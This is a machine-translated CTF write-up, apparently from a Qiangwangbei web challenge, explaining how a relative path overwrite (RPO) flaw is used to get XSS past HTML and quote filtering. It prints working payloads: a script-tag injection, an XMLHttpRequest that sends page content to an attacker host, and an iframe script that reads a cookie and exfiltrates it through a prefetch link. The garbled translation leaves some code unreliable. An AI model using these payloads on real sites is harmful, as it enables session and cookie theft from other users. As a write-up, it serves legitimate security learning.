RPO & Share Your Mind

Http://pupiles.com/qiangwangbei.html

Long ago There is an article about RPO, at that time forget what to do, anyway, long have not read the article ... It's been used so soon ... There was a lesson ...

Share your mind

This problem must be written about their own pit experience, first go in to browse the page function, there is a page to submit the bug, there is a place to create new articles

The last is to browse the article (but only to browse their own articles), the first thought is XSS+CSRF, a new article quoted a JS and then sent to the bot, and then Ajax request Admin article sent back. But according to this idea we found in the new article page our <> was filtered, so we can not directly construct a JS. Guess if you can do XSS in the report page, but found that there is filtering, only like the address of their own site to initiate the request, but "incredibly" can bypass the!!!!!!, payload:

Http://39.107.33.96:20000/index.php/report/<script src= "xxxxxx.com" ></script>

So the endless pit trip began, first of all bot return results no cookie, at first did not care about the set HttpOnly, (later generally understand the bot process, first check url-unread, and then add_cookie-read, here directly with < Script> tag is actually returned before Add_cookie, so without a cookie) let him Ajax request access to admin's article, the code is as follows

var a = new XMLHttpRequest (); A.open (' GET ', ' index.php/view/article/1 ', false); A.send (NULL); b = A.responsetext; (New Image ()). src = ' http://xxxxx/?flag= ' + escape (b);

Results bot returned results are not logged in, and then I was very confused, and then gave the hint1:phantomjs/2.1.1 results this hint to the later I thought is the day bot, all kinds of Google to find 2.1.1 loophole, until the afternoon out of the Hint2: The vulnerability is not the report ... Overturned the results of an afternoon's effort. It was not until the night that I remembered. The index page has one: Relative path reference for/static/js/bootstrap.min.js

Remember to see the RPO of winter vacation, about the principle of RPO here do not want to repeat, give a connection
Https://open.appscan.io/article-462.html
Here the article view page does not reference DOCTYPE HTML, so there is an RPO vulnerability, create a new article, the title of the article is empty (the title is not empty when adding a
Content input JS code such as alert (1)

Then visit this

http://39.107.33.96:20000/index.php/view/article/635/..%2f..%2f..%2f..%2findex.php

Replace 635 with your article code, here for the server to access the

http://39.107.33.96:20000/index.php

But for the browser, he is visiting

http://39.107.33.96:20000/index.php/view/article/635/..%2f..%2f..%2f..%2findex.php

Then this time the browser will initiate a JS request to request the original index.php will be loaded. /static/js/bootstrap.min.js is to

Http://39.107.33.96:20000/index.php/view/article/635/..%2f..%2f..%2f..%2findex.php/../static/js/bootstrap.min.js

Equivalent

Http://39.107.33.96:20000/index.php/view/article/635/static/bootstrap.min.js

Here to access the results and access

http://39.107.33.96:20000/index.php/view/article/635/

That is, the content of your article is the same (you can not understand the local test), the difference is that the browser is the JS engine to parse your article, that is, your article as a section of JS to execute. So here we can bypass <> 's filtering to perform XSS.
So we create a new article that contains

var a = new XMLHttpRequest (); A.open (' GET ', ' Yourvpsip ', false); A.send (NULL);

Then use the browser to access

http://39.107.33.96:20000/index.php/view/article/22957/..%2f..%2f..%2f..%2findex.php

Then found here actually did not initiate the request, look at the source code discovery is filtered "and", then I was smart to use anti-quotes, and then I fell into the endless metaphysical road, I found the local browser, VSP can receive the request

But submitted to the bot will not receive the request, and then I have been here for a super long time, also asked the question, bot and other issues ... Until the evening with String.fromCharCode to solve the problem of metaphysics (this point really stuck me for a long time), the back is relatively simple after receiving a request to find a cookie prompt

Lenovo to the national game read the topic of a subdirectory cookie https://www.lorexxar.cn/2017/07/11/guosai2017/script to change it to get a subdirectory cookie

var iframe = document.createelement ("iframe"); IFRAME.SRC = "/QWB_F14G/QWB"; Iframe.id = "Frame"; Document.body.appendChild (IFRAME); Iframe.onload = function () {var c = document.getElementById (' frame '). ContentWindow.document.cookie; var n0t = document.c Reateelement ("link"); N0t.setattribute ("rel", "prefetch"); N0t.setattribute ("href", "//xxx/?" + c); Document.head.appendChild (n0t); }

Then encode the contents of all quotes with String.fromcode ()